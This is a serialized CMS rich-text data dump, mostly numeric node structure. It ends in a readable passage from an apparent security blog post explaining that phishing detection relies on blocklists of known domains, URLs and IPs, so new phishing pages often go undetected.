},{"nodeType":186,"data":123634,"content":123635},{"uri":69574},[123636],{"nodeType":173,"value":69577,"marks":123637,"data":123639},[123638],{"type":194},{},{"nodeType":173,"value":69582,"marks":123641,"data":123642},[],{},{"nodeType":312,"data":123644,"content":123647},{"target":123645},{"sys":123646},{"id":69589,"type":317,"linkType":318},[],{"nodeType":312,"data":123649,"content":123652},{"target":123650},{"sys":123651},{"id":69595,"type":317,"linkType":318},[],{"nodeType":231,"data":123654,"content":123655},{},[],{"nodeType":169,"data":123657,"content":123658},{},[123659],{"nodeType":173,"value":69604,"marks":123660,"data":123662},[123661],{"type":370},{},{"nodeType":178,"data":123664,"content":123665},{},[123666],{"nodeType":173,"value":69612,"marks":123667,"data":123668},[],{},{"nodeType":178,"data":123670,"content":123671},{},[123672],{"nodeType":173,"value":69619,"marks":123673,"data":123674},[],{},{"nodeType":312,"data":123676,"content":123679},{"target":123677},{"sys":123678},{"id":69626,"type":317,"linkType":318},[],{"nodeType":231,"data":123681,"content":123682},{},[],{"nodeType":169,"data":123684,"content":123685},{},[123686],{"nodeType":173,"value":69635,"marks":123687,"data":123689},[123688],{"type":370},{},{"nodeType":178,"data":123691,"content":123692},{},[123693],{"nodeType":173,"value":69643,"marks":123694,"data":123695},[],{},{"nodeType":178,"data":123697,"content":123698},{},[123699],{"nodeType":173,"value":69650,"marks":123700,"data":123701},[],{},{"nodeType":231,"data":123703,"content":123704},{},[],{"nodeType":169,"data":123706,"content":123707},{},[123708],{"nodeType":173,"value":69660,"marks":123709,"data":123711},[123710],{"type":370},{},{"nodeType":178,"data":123713,"content":123714},{},[123715],{"nodeType":173,"value":69668,"marks":123716,"data":123717},[],{},{"nodeType":178,"data":123719,"content":123720},{},[123721],{"nodeType":173,"value":69675,"marks":123722,"data":123723},[],{},{"nodeType":312,"data":123725,"content":123728},{"target":123726},{"sys":123727},{"id":69682,"type":317,"linkType":318},[],{"nodeType":178,"data":123730,"content":123731},{},[123732],{"nodeType":173,"value":69688,"marks":123733,"data":123734},[],{},{"nodeType":250,"data":123736,"content":123737},{},[123738,123747,123756],{"nodeType":254,"data":123739,"content":123740},{},[123741],{"nodeType":178,"data":123742,"content":123743},{},[123744],{"nodeType":173,"value":69701,"marks":123745,"data":123746},[],{},{"nodeType":254,"data":123748,"content":123749},{},[123750],{"nodeType":178,"data":123751,"content":123752},{},[123753],{"nodeType":173,"value":69711,"marks":123754,"data":123755},[],{},{"nodeType":254,"data":123757,"content":123758},{},[123759],{"nodeType":178,"data":123760,"content":123761},{},[123762],{"nodeType":173,"value":69721,"marks":123763,"data":123764},[],{},{"nodeType":312,"data":123766,"content":123769},{"target":123767},{"sys":123768},{"id":69728,"type":317,"linkType":318},[],{"nodeType":235,"data":123771,"content":123772},{},[123773],{"nodeType":173,"value":461,"marks":123774,"data":123776},[123775],{"type":370},{},{"nodeType":178,"data":123778,"content":123779},{},[123780],{"nodeType":173,"value":69741,"marks":123781,"data":123782},[],{},{"nodeType":178,"data":123784,"content":123785},{},[123786,123789,123795],{"nodeType":173,"value":69748,"marks":123787,"data":123788},[],{},{"nodeType":186,"data":123790,"content":123791},{"uri":1469},[123792],{"nodeType":173,"value":476,"marks":123793,"data":123794},[],{},{"nodeType":173,"value":69758,"marks":123796,"data":123797},[],{},{"items":123799},[123800,123802],{"sys":123801,"name":505},{"id":504},{"sys":123803,"name":509},{"id":508},{"items":123805},[123806],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":123807},{"url":8615},{"__typename":1528,"sys":123809,"content":123810,"title":122341,"synopsis":122342,"hashTags":118,"publishedDate":122343,"slug":122344,"tagsCollection":124470,"authorsCollection":124476},{"id":121579},{"json":123811},{"nodeType":165,"data":123812,"content":123813},{},[123814,123820,123850,123856,123872,123878,123881,123888,123894,123899,123905,123910,123915,123921,123937,123942,123948,123951,123958,123974,123995,124001,124008,124014,124020,124025,124032,124048,124064,124069,124075,124080,124087,124113,124118,124124,124127,124134,124140,124156,124162,124167,124174,124180,124186,124192,124198,124258,124264,124271,124286,124291,124297,124303,124308,124314,124319,124326,124332,124337,124342,124348,124351,124358,124384,124390,124406,124412,124422,124428,124431,124438,124454],{"nodeType":178,"data":123815,"content":123816},{},[123817],{"nodeType":173,"value":121588,"marks":123818,"data":123819},[],{},{"nodeType":250,"data":123821,"content":123822},{},[123823,123832,123841],{"nodeType":254,"data":123824,"content":123825},{},[123826],{"nodeType":178,"data":123827,"content":123828},{},[123829],{"nodeType":173,"value":121601,"marks":123830,"data":123831},[],{},{"nodeType":254,"data":123833,"content":123834},{},[123835],{"nodeType":178,"data":123836,"content":123837},{},[123838],{"nodeType":173,"value":121611,"marks":123839,"data":123840},[],{},{"nodeType":254,"data":123842,"content":123843},{},[123844],{"nodeType":178,"data":123845,"content":123846},{},[123847],{"nodeType":173,"value":121621,"marks":123848,"data":123849},[],{},{"nodeType":178,"data":123851,"content":123852},{},[123853],{"nodeType":173,"value":121628,"marks":123854,"data":123855},[],{},{"nodeType":178,"data":123857,"content":123858},{},[123859,123862,123869],{"nodeType":173,"value":121635,"marks":123860,"data":123861},[],{},{"nodeType":186,"data":123863,"content":123864},{"uri":121640},[123865],{"nodeType":173,"value":121643,"marks":123866,"data":123868},[123867],{"type":194},{},{"nodeType":173,"value":197,"marks":123870,"data":123871},[],{},{"nodeType":178,"data":123873,"content":123874},{},[123875],{"nodeType":173,"value":121654,"marks":123876,"data":123877},[],{},{"nodeType":231,"data":123879,"content":123880},{},[],{"nodeType":169,"data":123882,"content":123883},{},[123884],{"nodeType":173,"value":24096,"marks":123885,"data":123887},[123886],{"type":370},{},{"nodeType":178,"data":123889,"content":123890},{},[123891],{"nodeType":173,"value":121671,"marks":123892,"data":123893},[],{},{"nodeType":312,"data":123895,"content":123898},{"target":123896},{"sys":123897},{"id":121678,"type":317,"linkType":318},[],{"nodeType":178,"data":123900,"content":123901},{},[123902],{"nodeType":173,"value":121684,"marks":123903,"data":123904},[],{},{"nodeType":312,"data":123906,"content":123909},{"target":123907},{"sys":123908},{"id":121691,"type":317,"linkType":318},[],{"nodeType":312,"data":123911,"content":123914},{"target":123912},{"sys":123913},{"id":121697,"type":317,"linkType":318},[],{"nodeType":178,"data":123916,"content":123917},{},[123918],{"nodeType":173,"value":121703,"marks":123919,"data":123920},[],{},{"nodeType":178,"data":123922,"content":123923},{},[123924,123927,123934],{"nodeType":173,"value":121710,"marks":123925,"data":123926},[],{},{"nodeType":186,"data":123928,"content":123929},{"uri":832},[123930],{"nodeType":173,"value":4519,"marks":123931,"data":123933},[123932],{"type":194},{},{"nodeType":173,"value":53584,"marks":123935,"data":123936},[],{},{"nodeType":312,"data":123938,"content":123941},{"target":123939},{"sys":123940},{"id":121727,"type":317,"linkType":318},[],{"nodeType":178,"data":123943,"content":123944},{},[123945],{"nodeType":173,"value":121733,"marks":123946,"data":123947},[],{},{"nodeType":231,"data":123949,"content":123950},{},[],{"nodeType":169,"data":123952,"content":123953},{},[123954],{"nodeType":173,"value":121743,"marks":123955,"data":123957},[123956],{"type":370},{},{"nodeType":178,"data":123959,"content":123960},{},[123961,123964,123971],{"nodeType":173,"value":121751,"marks":123962,"data":123963},[],{},{"nodeType":186,"data":123965,"content":123966},{"uri":97747},[123967],{"nodeType":173,"value":121758,"marks":123968,"data":123970},[123969],{"type":194},{},{"nodeType":173,"value":121763,"marks":123972,"data":123973},[],{},{"nodeType":250,"data":123975,"content":123976},{},[123977,123986],{"nodeType":254,"data":123978,"content":123979},{},[123980],{"nodeType":178,"data":123981,"content":123982},{},[123983],{"nodeType":173,"value":121776,"marks":123984,"data":123985},[],{},{"nodeType":254,"data":123987,"content":123988},{},[123989],{"nodeType":178,"data":123990,"content":123991},{},[123992],{"nodeType":173,"value":121786,"marks":123993,"data":123994},[],{},{"nodeType":178,"data":123996,"content":123997},{},[123998],{"nodeType":173,"value":121793,"marks":123999,"data":124000},[],{},{"nodeType":235,"data":124002,"content":124003},{},[124004],{"nodeType":173,"value":121800,"marks":124005,"data":124007},[124006],{"type":370},{},{"nodeType":178,"data":124009,"content":124010},{},[124011],{"nodeType":173,"value":121808,"marks":124012,"data":124013},[],{},{"nodeType":178,"data":124015,"content":124016},{},[124017],{"nodeType":173,"value":121815,"marks":124018,"data":124019},[],{},{"nodeType":312,"data":124021,"content":124024},{"target":124022},{"sys":124023},{"id":121822,"type":317,"linkType":318},[],{"nodeType":235,"data":124026,"content":124027},{},[124028],{"nodeType":173,"value":121828,"marks":124029,"data":124031},[124030],{"type":370},{},{"nodeType":178,"data":124033,"content":124034},{},[124035,124038,124045],{"nodeType":173,"value":121836,"marks":124036,"data":124037},[],{},{"nodeType":186,"data":124039,"content":124040},{"uri":74693},[124041],{"nodeType":173,"value":121843,"marks":124042,"data":124044},[124043],{"type":194},{},{"nodeType":173,"value":121848,"marks":124046,"data":124047},[],{},{"nodeType":178,"data":124049,"content":124050},{},[124051,124054,124061],{"nodeType":173,"value":121855,"marks":124052,"data":124053},[],{},{"nodeType":186,"data":124055,"content":124056},{"uri":74693},[124057],{"nodeType":173,"value":121862,"marks":124058,"data":124060},[124059],{"type":194},{},{"nodeType":173,"value":121867,"marks":124062,"data":124063},[],{},{"nodeType":312,"data":124065,"content":124068},{"target":124066},{"sys":124067},{"id":121874,"type":317,"linkType":318},[],{"nodeType":178,"data":124070,"content":124071},{},[124072],{"nodeType":173,"value":121880,"marks":124073,"data":124074},[],{},{"nodeType":312,"data":124076,"content":124079},{"target":124077},{"sys":124078},{"id":121887,"type":317,"linkType":318},[],{"nodeType":235,"data":124081,"content":124082},{},[124083],{"nodeType":173,"value":121893,"marks":124084,"data":124086},[124085],{"type":370},{},{"nodeType":178,"data":124088,"content":124089},{},[124090,124093,124100,124103,124110],{"nodeType":173,"value":121901,"marks":124091,"data":124092},[],{},{"nodeType":186,"data":124094,"content":124095},{"uri":121906},[124096],{"nodeType":173,"value":121909,"marks":124097,"data":124099},[124098],{"type":194},{},{"nodeType":173,"value":121914,"marks":124101,"data":124102},[],{},{"nodeType":186,"data":124104,"content":124105},{"uri":88239},[124106],{"nodeType":173,"value":121921,"marks":124107,"data":124109},[124108],{"type":194},{},{"nodeType":173,"value":121926,"marks":124111,"data":124112},[],{},{"nodeType":312,"data":124114,"content":124117},{"target":124115},{"sys":124116},{"id":121933,"type":317,"linkType":318},[],{"nodeType":178,"data":124119,"content":124120},{},[124121],{"nodeType":173,"value":121939,"marks":124122,"data":124123},[],{},{"nodeType":231,"data":124125,"content":124126},{},[],{"nodeType":169,"data":124128,"content":124129},{},[124130],{"nodeType":173,"value":121949,"marks":124131,"data":124133},[124132],{"type":370},{},{"nodeType":178,"data":124135,"content":124136},{},[124137],{"nodeType":173,"value":121957,"marks":124138,"data":124139},[],{},{"nodeType":178,"data":124141,"content":124142},{},[124143,124146,124153],{"nodeType":173,"value":121964,"marks":124144,"data":124145},[],{},{"nodeType":186,"data":124147,"content":124148},{"uri":121969},[124149],{"nodeType":173,"value":121972,"marks":124150,"data":124152},[124151],{"type":194},{},{"nodeType":173,"value":121977,"marks":124154,"data":124155},[],{},{"nodeType":178,"data":124157,"content":124158},{},[124159],{"nodeType":173,"value":121984,"marks":124160,"data":124161},[],{},{"nodeType":312,"data":124163,"content":124166},{"target":124164},{"sys":124165},{"id":121991,"type":317,"linkType":318},[],{"nodeType":235,"data":124168,"content":124169},{},[124170],{"nodeType":173,"value":121997,"marks":124171,"data":124173},[124172],{"type":370},{},{"nodeType":178,"data":124175,"content":124176},{},[124177],{"nodeType":173,"value":122005,"marks":124178,"data":124179},[],{},{"nodeType":178,"data":124181,"content":124182},{},[124183],{"nodeType":173,"value":122012,"marks":124184,"data":124185},[],{},{"nodeType":178,"data":124187,"content":124188},{},[124189],{"nodeType":173,"value":122019,"marks":124190,"data":124191},[],{},{"nodeType":178,"data":124193,"content":124194},{},[124195],{"nodeType":173,"value":122026,"marks":124196,"data":124197},[],{},{"nodeType":250,"data":124199,"content":124200},{},[124201,124230,124249],{"nodeType":254,"data":124202,"content":124203},{},[124204],{"nodeType":178,"data":124205,"content":124206},{},[124207,124210,124217,124220,124227],{"nodeType":173,"value":122039,"marks":124208,"data":124209},[],{},{"nodeType":186,"data":124211,"content":124212},{"uri":819},[124213],{"nodeType":173,"value":27706,"marks":124214,"data":124216},[124215],{"type":194},{},{"nodeType":173,"value":122050,"marks":124218,"data":124219},[],{},{"nodeType":186,"data":124221,"content":124222},{"uri":27726},[124223],{"nodeType":173,"value":27729,"marks":124224,"data":124226},[124225],{"type":194},{},{"nodeType":173,"value":122061,"marks":124228,"data":124229},[],{},{"nodeType":254,"data":124231,"content":124232},{},[124233],{"nodeType":178,"data":124234,"content":124235},{},[124236,124239,124246],{"nodeType":173,"value":122071,"marks":124237,"data":124238},[],{},{"nodeType":186,"data":124240,"content":124241},{"uri":122076},[124242],{"nodeType":173,"value":122079,"marks":124243,"data":124245},[124244],{"type":194},{},{"nodeType":173,"value":122084,"marks":124247,"data":124248},[],{},{"nodeType":254,"data":124250,"content":124251},{},[124252],{"nodeType":178,"data":124253,"content":124254},{},[124255],{"nodeType":173,"value":122094,"marks":124256,"data":124257},[],{},{"nodeType":178,"data":124259,"content":124260},{},[124261],{"nodeType":173,"value":122101,"marks":124262,"data":124263},[],{},{"nodeType":235,"data":124265,"content":124266},{},[124267],{"nodeType":173,"value":122108,"marks":124268,"data":124270},[124269],{"type":370},{},{"nodeType":178,"data":124272,"content":124273},{},[124274,124277,124283],{"nodeType":173,"value":122116,"marks":124275,"data":124276},[],{},{"nodeType":186,"data":124278,"content":124279},{"uri":122121},[124280],{"nodeType":173,"value":122124,"marks":124281,"data":124282},[],{},{"nodeType":173,"value":122128,"marks":124284,"data":124285},[],{},{"nodeType":312,"data":124287,"content":124290},{"target":124288},{"sys":124289},{"id":122135,"type":317,"linkType":318},[],{"nodeType":178,"data":124292,"content":124293},{},[124294],{"nodeType":173,"value":122141,"marks":124295,"data":124296},[],{},{"nodeType":178,"data":124298,"content":124299},{},[124300],{"nodeType":173,"value":122148,"marks":124301,"data":124302},[],{},{"nodeType":312,"data":124304,"content":124307},{"target":124305},{"sys":124306},{"id":122155,"type":317,"linkType":318},[],{"nodeType":178,"data":124309,"content":124310},{},[124311],{"nodeType":173,"value":122161,"marks":124312,"data":124313},[],{},{"nodeType":312,"data":124315,"content":124318},{"target":124316},{"sys":124317},{"id":122168,"type":317,"linkType":318},[],{"nodeType":235,"data":124320,"content":124321},{},[124322],{"nodeType":173,"value":122174,"marks":124323,"data":124325},[124324],{"type":370},{},{"nodeType":178,"data":124327,"content":124328},{},[124329],{"nodeType":173,"value":122182,"marks":124330,"data":124331},[],{},{"nodeType":312,"data":124333,"content":124336},{"target":124334},{"sys":124335},{"id":122189,"type":317,"linkType":318},[],{"nodeType":312,"data":124338,"content":124341},{"target":124339},{"sys":124340},{"id":122195,"type":317,"linkType":318},[],{"nodeType":178,"data":124343,"content":124344},{},[124345],{"nodeType":173,"value":122201,"marks":124346,"data":124347},[],{},{"nodeType":231,"data":124349,"content":124350},{},[],{"nodeType":169,"data":124352,"content":124353},{},[124354],{"nodeType":173,"value":16139,"marks":124355,"data":124357},[124356],{"type":370},{},{"nodeType":178,"data":124359,"content":124360},{},[124361,124364,124371,124374,124381],{"nodeType":173,"value":122218,"marks":124362,"data":124363},[],{},{"nodeType":186,"data":124365,"content":124366},{"uri":88239},[124367],{"nodeType":173,"value":88245,"marks":124368,"data":124370},[124369],{"type":194},{},{"nodeType":173,"value":933,"marks":124372,"data":124373},[],{},{"nodeType":186,"data":124375,"content":124376},{"uri":122233},[124377],{"nodeType":173,"value":122236,"marks":124378,"data":124380},[124379],{"type":194},{},{"nodeType":173,"value":122241,"marks":124382,"data":124383},[],{},{"nodeType":178,"data":124385,"content":124386},{},[124387],{"nodeType":173,"value":122248,"marks":124388,"data":124389},[],{},{"nodeType":178,"data":124391,"content":124392},{},[124393,124396,124403],{"nodeType":173,"value":122255,"marks":124394,"data":124395},[],{},{"nodeType":186,"data":124397,"content":124398},{"uri":81621},[124399],{"nodeType":173,"value":122262,"marks":124400,"data":124402},[124401],{"type":194},{},{"nodeType":173,"value":122267,"marks":124404,"data":124405},[],{},{"nodeType":178,"data":124407,"content":124408},{},[124409],{"nodeType":173,"value":122274,"marks":124410,"data":124411},[],{},{"nodeType":3769,"data":124413,"content":124414},{},[124415],{"nodeType":178,"data":124416,"content":124417},{},[124418],{"nodeType":173,"value":122284,"marks":124419,"data":124421},[124420],{"type":370},{},{"nodeType":178,"data":124423,"content":124424},{},[124425],{"nodeType":173,"value":122292,"marks":124426,"data":124427},[],{},{"nodeType":231,"data":124429,"content":124430},{},[],{"nodeType":169,"data":124432,"content":124433},{},[124434],{"nodeType":173,"value":1422,"marks":124435,"data":124437},[124436],{"type":370},{},{"nodeType":178,"data":124439,"content":124440},{},[124441,124444,124451],{"nodeType":173,"value":122309,"marks":124442,"data":124443},[],{},{"nodeType":186,"data":124445,"content":124446},{"uri":122314},[124447],{"nodeType":173,"value":122317,"marks":124448,"data":124450},[124449],{"type":194},{},{"nodeType":173,"value":197,"marks":124452,"data":124453},[],{},{"nodeType":178,"data":124455,"content":124456},{},[124457,124460,124467],{"nodeType":173,"value":122328,"marks":124458,"data":124459},[],{},{"nodeType":186,"data":124461,"content":124462},{"uri":473},[124463],{"nodeType":173,"value":2889,"marks":124464,"data":124466},[124465],{"type":194},{},{"nodeType":173,"value":1477,"marks":124468,"data":124469},[],{},{"items":124471},[124472,124474],{"sys":124473,"name":505},{"id":504},{"sys":124475,"name":509},{"id":508},{"items":124477},[124478],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":124479},{"url":1496},{"__typename":1528,"sys":124481,"content":124482,"title":107128,"synopsis":107129,"hashTags":118,"publishedDate":107130,"slug":107131,"tagsCollection":124862,"authorsCollection":124868},{"id":106695},{"json":124483},{"data":124484,"content":124485,"nodeType":165},{},[124486,124512,124528,124534,124540,124543,124550,124556,124561,124566,124571,124577,124593,124598,124601,124608,124614,124620,124626,124631,124637,124643,124648,124654,124670,124675,124681,124684,124691,124697,124702,124708,124749,124754,124760,124763,124770,124776,124782,124787,124792,124797,124800,124807,124813,124818,124824,124830,124833,124840,124846],{"data":124487,"content":124488,"nodeType":178},{},[124489,124492,124499,124502,124509],{"data":124490,"marks":124491,"value":37,"nodeType":173},{},[],{"data":124493,"content":124494,"nodeType":186},{"uri":19838},[124495],{"data":124496,"marks":124497,"value":39940,"nodeType":173},{},[124498],{"type":194},{"data":124500,"marks":124501,"value":106716,"nodeType":173},{},[],{"data":124503,"content":124504,"nodeType":186},{"uri":106719},[124505],{"data":124506,"marks":124507,"value":88245,"nodeType":173},{},[124508],{"type":194},{"data":124510,"marks":124511,"value":106728,"nodeType":173},{},[],{"data":124513,"content":124514,"nodeType":178},{},[124515,124518,124525],{"data":124516,"marks":124517,"value":106735,"nodeType":173},{},[],{"data":124519,"content":124520,"nodeType":186},{"uri":106738},[124521],{"data":124522,"marks":124523,"value":106744,"nodeType":173},{},[124524],{"type":194},{"data":124526,"marks":124527,"value":106748,"nodeType":173},{},[],{"data":124529,"content":124530,"nodeType":178},{},[124531],{"data":124532,"marks":124533,"value":106755,"nodeType":173},{},[],{"data":124535,"content":124536,"nodeType":178},{},[124537],{"data":124538,"marks":124539,"value":106762,"nodeType":173},{},[],{"data":124541,"content":124542,"nodeType":231},{},[],{"data":124544,"content":124545,"nodeType":169},{},[124546],{"data":124547,"marks":124548,"value":106773,"nodeType":173},{},[124549],{"type":370},{"data":124551,"content":124552,"nodeType":178},{},[124553],{"data":124554,"marks":124555,"value":106780,"nodeType":173},{},[],{"data":124557,"content":124560,"nodeType":312},{"target":124558},{"sys":124559},{"id":106785,"type":317,"linkType":318},[],{"data":124562,"content":124565,"nodeType":312},{"target":124563},{"sys":124564},{"id":106791,"type":317,"linkType":318},[],{"data":124567,"content":124570,"nodeType":312},{"target":124568},{"sys":124569},{"id":106797,"type":317,"linkType":318},[],{"data":124572,"content":124573,"nodeType":178},{},[124574],{"data":124575,"marks":124576,"value":106805,"nodeType":173},{},[],{"data":124578,"content":124579,"nodeType":178},{},[124580,124583,124590],{"data":124581,"marks":124582,"value":106812,"nodeType":173},{},[],{"data":124584,"content":124585,"nodeType":186},{"uri":106815},[124586],{"data":124587,"marks":124588,"value":106821,"nodeType":173},{},[124589],{"type":194},{"data":124591,"marks":124592,"value":106825,"nodeType":173},{},[],{"data":124594,"content":124597,"nodeType":312},{"target":124595},{"sys":124596},{"id":106830,"type":317,"linkType":318},[],{"data":124599,"content":124600,"nodeType":231},{},[],{"data":124602,"content":124603,"nodeType":169},{},[124604],{"data":124605,"marks":124606,"value":106842,"nodeType":173},{},[124607],{"type":370},{"data":124609,"content":124610,"nodeType":178},{},[124611],{"data":124612,"marks":124613,"value":106849,"nodeType":173},{},[],{"data":124615,"content":124616,"nodeType":178},{},[124617],{"data":124618,"marks":124619,"value":106856,"nodeType":173},{},[],{"data":124621,"content":124622,"nodeType":178},{},[124623],{"data":124624,"marks":124625,"value":106863,"nodeType":173},{},[],{"data":124627,"content":124630,"nodeType":312},{"target":124628},{"sys":124629},{"id":106868,"type":317,"linkType":318},[],{"data":124632,"content":124633,"nodeType":178},{},[124634],{"data":124635,"marks":124636,"value":106876,"nodeType":173},{},[],{"data":124638,"content":124639,"nodeType":178},{},[124640],{"data":124641,"marks":124642,"value":106883,"nodeType":173},{},[],{"data":124644,"content":124647,"nodeType":312},{"target":124645},{"sys":124646},{"id":106888,"type":317,"linkType":318},[],{"data":124649,"content":124650,"nodeType":178},{},[124651],{"data":124652,"marks":124653,"value":106896,"nodeType":173},{},[],{"data":124655,"content":124656,"nodeType":178},{},[124657,124660,124667],{"data":124658,"marks":124659,"value":106903,"nodeType":173},{},[],{"data":124661,"content":124662,"nodeType":186},{"uri":74693},[124663],{"data":124664,"marks":124665,"value":70035,"nodeType":173},{},[124666],{"type":194},{"data":124668,"marks":124669,"value":106914,"nodeType":173},{},[],{"data":124671,"content":124674,"nodeType":312},{"target":124672},{"sys":124673},{"id":69500,"type":317,"linkType":318},[],{"data":124676,"content":124677,"nodeType":178},{},[124678],{"data":124679,"marks":124680,"value":106926,"nodeType":173},{},[],{"data":124682,"content":124683,"nodeType":231},{},[],{"data":124685,"content":124686,"nodeType":169},{},[124687],{"data":124688,"marks":124689,"value":106937,"nodeType":173},{},[124690],{"type":370},{"data":124692,"content":124693,"nodeType":178},{},[124694],{"data":124695,"marks":124696,"value":106944,"nodeType":173},{},[],{"data":124698,"content":124701,"nodeType":312},{"target":124699},{"sys":124700},{"id":106949,"type":317,"linkType":318},[],{"data":124703,"content":124704,"nodeType":178},{},[124705],{"data":124706,"marks":124707,"value":106957,"nodeType":173},{},[],{"data":124709,"content":124710,"nodeType":250},{},[124711,124730],{"data":124712,"content":124713,"nodeType":254},{},[124714],{"data":124715,"content":124716,"nodeType":178},{},[124717,124720,124727],{"data":124718,"marks":124719,"value":37,"nodeType":173},{},[],{"data":124721,"content":124722,"nodeType":186},{"uri":74693},[124723],{"data":124724,"marks":124725,"value":106977,"nodeType":173},{},[124726],{"type":194},{"data":124728,"marks":124729,"value":106981,"nodeType":173},{},[],{"data":124731,"content":124732,"nodeType":254},{},[124733],{"data":124734,"content":124735,"nodeType":178},{},[124736,124739,124746],{"data":124737,"marks":124738,"value":37,"nodeType":173},{},[],{"data":124740,"content":124741,"nodeType":186},{"uri":97747},[124742],{"data":124743,"marks":124744,"value":106998,"nodeType":173},{},[124745],{"type":194},{"data":124747,"marks":124748,"value":107002,"nodeType":173},{},[],{"data":124750,"content":124753,"nodeType":312},{"target":124751},{"sys":124752},{"id":107007,"type":317,"linkType":318},[],{"data":124755,"content":124756,"nodeType":178},{},[124757],{"data":124758,"marks":124759,"value":107015,"nodeType":173},{},[],{"data":124761,"content":124762,"nodeType":231},{},[],{"data":124764,"content":124765,"nodeType":169},{},[124766],{"data":124767,"marks":124768,"value":107026,"nodeType":173},{},[124769],{"type":370},{"data":124771,"content":124772,"nodeType":178},{},[124773],{"data":124774,"marks":124775,"value":107033,"nodeType":173},{},[],{"data":124777,"content":124778,"nodeType":178},{},[124779],{"data":124780,"marks":124781,"value":107040,"nodeType":173},{},[],{"data":124783,"content":124786,"nodeType":312},{"target":124784},{"sys":124785},{"id":107045,"type":317,"linkType":318},[],{"data":124788,"content":124791,"nodeType":312},{"target":124789},{"sys":124790},{"id":98287,"type":317,"linkType":318},[],{"data":124793,"content":124796,"nodeType":312},{"target":124794},{"sys":124795},{"id":107056,"type":317,"linkType":318},[],{"data":124798,"content":124799,"nodeType":231},{},[],{"data":124801,"content":124802,"nodeType":169},{},[124803],{"data":124804,"marks":124805,"value":107068,"nodeType":173},{},[124806],{"type":370},{"data":124808,"content":124809,"nodeType":178},{},[124810],{"data":124811,"marks":124812,"value":107075,"nodeType":173},{},[],{"data":124814,"content":124817,"nodeType":312},{"target":124815},{"sys":124816},{"id":107080,"type":317,"linkType":318},[],{"data":124819,"content":124820,"nodeType":178},{},[124821],{"data":124822,"marks":124823,"value":107088,"nodeType":173},{},[],{"data":124825,"content":124826,"nodeType":178},{},[124827],{"data":124828,"marks":124829,"value":107095,"nodeType":173},{},[],{"data":124831,"content":124832,"nodeType":231},{},[],{"data":124834,"content":124835,"nodeType":169},{},[124836],{"data":124837,"marks":124838,"value":461,"nodeType":173},{},[124839],{"type":370},{"data":124841,"content":124842,"nodeType":178},{},[124843],{"data":124844,"marks":124845,"value":98309,"nodeType":173},{},[],{"data":124847,"content":124848,"nodeType":178},{},[124849,124852,124859],{"data":124850,"marks":124851,"value":61741,"nodeType":173},{},[],{"data":124853,"content":124854,"nodeType":186},{"uri":77659},[124855],{"data":124856,"marks":124857,"value":476,"nodeType":173},{},[124858],{"type":194},{"data":124860,"marks":124861,"value":69758,"nodeType":173},{},[],{"items":124863},[124864,124866],{"sys":124865,"name":505},{"id":504},{"sys":124867,"name":509},{"id":508},{"items":124869},[124870],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":124871},{"url":1496},{"items":124873},[124874],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":124875},{"url":1496},{"json":124877,"links":125383},{"nodeType":165,"data":124878,"content":124879},{},[124880,124886,124892,124904,124916,124919,124927,124933,124940,124947,124954,124961,124967,124974,124979,124982,124990,124997,125030,125037,125045,125052,125059,125066,125072,125080,125087,125092,125099,125120,125127,125135,125142,125149,125156,125161,125168,125185,125188,125196,125210,125216,125250,125258,125261,125269,125276,125290,125295,125301,125307,125314,125319,125326,125331,125334,125341,125347,125352,125357,125377],{"nodeType":178,"data":124881,"content":124882},{},[124883],{"nodeType":173,"value":97703,"marks":124884,"data":124885},[],{},{"nodeType":178,"data":124887,"content":124888},{},[124889],{"nodeType":173,"value":97717,"marks":124890,"data":124891},[],{},{"nodeType":178,"data":124893,"content":124894},{},[124895,124899],{"nodeType":173,"value":124896,"marks":124897,"data":124898},"A key challenge with phishing detection is that based on the known-bad indicators that we as an industry use to commonly detect phishing pages, pretty much every phishing attack looks different and uses a unique combination of domain, URL, IPs, page composition, target app, etc. ",[],{},{"nodeType":173,"value":124900,"marks":124901,"data":124903},"Effectively, every phishing attack is completely novel. You might even describe them as “zero-days” (cue the collective sharp intake of breath)...",[124902],{"type":370},{},{"nodeType":178,"data":124905,"content":124906},{},[124907,124911],{"nodeType":173,"value":124908,"marks":124909,"data":124910},"The goal here isn’t to sensationalize phishing attacks — quite the opposite. Rather, this shines a light on the state of phishing detection controls. ",[],{},{"nodeType":173,"value":124912,"marks":124913,"data":124915},"Frankly, if every phishing attack is a zero-day, something has gone very wrong with how we detect these attacks…",[124914],{"type":370},{},{"nodeType":231,"data":124917,"content":124918},{},[],{"nodeType":169,"data":124920,"content":124921},{},[124922],{"nodeType":173,"value":124923,"marks":124924,"data":124926},"Phishing detection 101",[124925],{"type":370},{},{"nodeType":178,"data":124928,"content":124929},{},[124930],{"nodeType":173,"value":97862,"marks":124931,"data":124932},[],{},{"nodeType":178,"data":124934,"content":124935},{},[124936],{"nodeType":173,"value":124937,"marks":124938,"data":124939},"Phishing detection, at its core, relies on blocklists made up of indicators of compromise (IoCs) relating to phishing pages that have been successfully identified as malicious. These IoCs consist of malicious domains, URLs, and IPs that have appeared in an attack. ",[],{},{"nodeType":178,"data":124941,"content":124942},{},[124943],{"nodeType":173,"value":124944,"marks":124945,"data":124946},"IoCs are collected by security vendors and service providers across a range of sources. Mostly though, the malicious page needs to be used in a phishing campaign before it has a chance of being detected. This means that a would-be victim needs to interact with it in some way — either by falling for a phishing attack, or reporting it as suspicious. ",[],{},{"nodeType":178,"data":124948,"content":124949},{},[124950],{"nodeType":173,"value":124951,"marks":124952,"data":124953},"Once a page is flagged, it can be investigated — either manually (by a security person) or automatically (by a product/tool). If the page can be accessed and analyzed, and malicious content is found (more on this later) then the page’s IoCs can be collected and added to a blocklist. ",[],{},{"nodeType":178,"data":124955,"content":124956},{},[124957],{"nodeType":173,"value":124958,"marks":124959,"data":124960},"This information will then begin to circulate across the various threat intelligence feeds and security products leveraging this information. The majority of phishing detection and control enforcement is focused at the email and network layer — typically at the Secure Email Gateway (SEG), Secure Web Gateway (SWG)/proxy, or both. ",[],{},{"nodeType":312,"data":124962,"content":124966},{"target":124963},{"sys":124964},{"id":124965,"type":317,"linkType":318},"7xPrHlTjDI1Lc620fAnxvX",[],{"nodeType":178,"data":124968,"content":124969},{},[124970],{"nodeType":173,"value":124971,"marks":124972,"data":124973},"If you’re following the thought pattern here, you can probably already see the root of the problem. To detect and block a phishing page, it needs to be used in an attack 